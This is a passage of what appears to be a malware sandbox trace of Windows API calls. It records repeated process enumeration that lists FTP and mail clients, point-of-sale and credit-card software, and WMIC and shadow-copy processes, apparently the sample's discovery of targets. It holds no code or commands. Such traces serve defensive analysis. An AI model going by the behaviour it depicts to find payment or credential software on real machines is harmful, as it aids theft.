hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.190] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.224] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.226] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.227] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.228] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.228] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.229] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.230] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.231] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.232] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.233] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.234] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.235] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.236] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.251] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.252] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.255] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.256] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.257] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.258] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.260] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.264] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.266] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.279] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.280] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.281] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.282] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.282] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.283] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.286] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.287] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.288] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.289] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.290] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0099.290] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0099.291] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0099.292] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0099.293] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.294] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.294] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.295] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0099.296] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0099.297] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0099.297] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.298] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0099.299] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0099.302] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.302] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0099.303] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.303] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.303] GlobalUnlock (hMem=0x45000c) returned 0 [0099.303] GlobalLock (hMem=0x45000c) returned 0x588f38 [0099.303] GlobalLock (hMem=0x450004) returned 0x56f100 [0099.303] GlobalHandle (pMem=0x56f100) returned 0x450004 [0099.303] GlobalUnlock (hMem=0x450004) returned 0 [0099.303] GlobalReAlloc (hMem=0x450004, dwBytes=0x10, uFlags=0x2) returned 0x450004 [0099.304] GlobalLock (hMem=0x450004) returned 0x56f100 [0099.304] GlobalHandle (pMem=0x588f38) returned 0x45000c [0099.304] GlobalUnlock (hMem=0x45000c) returned 0 [0099.304] GlobalHandle (pMem=0x56f100) returned 0x450004 [0099.304] GlobalUnlock (hMem=0x450004) returned 0 [0099.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184 [0099.308] Process32First (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.309] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.309] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.310] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.311] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.311] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.312] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.312] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.313] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.314] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.314] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.318] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.319] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.319] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.320] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.321] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.321] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.322] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.323] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.323] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.324] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.324] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.325] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.326] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.326] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0099.327] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0099.328] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0099.328] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0099.329] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0099.329] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0099.330] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0099.383] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0099.384] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0099.384] 